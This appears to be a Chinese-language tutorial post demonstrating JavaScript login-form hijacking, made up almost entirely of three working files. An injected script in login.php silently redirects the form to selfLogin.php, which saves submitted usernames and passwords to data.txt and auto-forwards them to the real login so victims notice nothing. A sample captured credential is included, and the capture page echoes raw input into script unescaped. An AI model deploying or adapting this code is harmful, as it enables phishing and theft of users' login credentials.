共计 1412 个字符,预计需要花费 4 分钟才能阅读完成。
目录介绍
login.php 正常登录的文件
selfLogin.php 自定义的登录文件
data.txt 记录用户输入的数据
login.php
<?php
echo “<pre>”;
$userInfo = $_POST ;
if ($userInfo) {
# code…
var_dump($userInfo,’ 登录成功 ’) ;exit();
}
?>
<!DOCTYPE html>
<html>
<head>
<title> 登录 </title>
</head>
<body>
<form id=”login” method=”post” action=”login.php”>
用户姓名:<input type=”text” name=”name”>
用户密码:<input type=”password” name=”pwd”>
<input type=”submit” value=” 确认登录 ”>
</form>
</body>
<script type=”text/javascript”>
//js 劫持代码
window.onload = function (eve) {
var form = document.getElementById(‘login’);
form.innerHTML = ‘ <form id=”login” method=”post” > 用户姓名:<input type=”text” name=”name”> 用户密码:<input type=”password” name=”pwd”> <input type=”submit” value=” 确认登录 ”> </form> ‘ ;
// 钓鱼地址
form.action = “selfLogin.php” ;
}
</script>
</html>
selfLogin.php
<?php
$name = ” ;
$pwd = ” ;
//var_dump(‘ 数据被截取了 ’,$_POST) ;
if($_POST) {
// 记录获取的数据信息
$name = $_POST[‘name’] ;
$pwd = $_POST[‘pwd’] ;
file_put_contents(‘data.txt’, json_encode($_POST,true)) ;
}
?>
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
</body>
<script type=”text/javascript”>
// 构建之前的页面
window.onload = function (eve) {
var name = ‘<?php echo $name; ?>’ ;
var pwd = ‘<?php echo $pwd; ?>’ ;
if(name && pwd) {
var div = document.createElement(‘div’);
document.body.appendChild(div);
div.innerHTML =’ <form id=”login2″ method=”post” action=”login.php” > ‘+
‘ 用户姓名:<input type=”text” name=”name” value=”‘+name+'”> 用户密码:<input type=”password” name=”pwd” value=”‘+pwd+'”> ‘ ;
document.getElementById(‘login2’).submit();
}
}
</script>
</html>
data.txt
{“name”:”admin”,”pwd”:”123456″}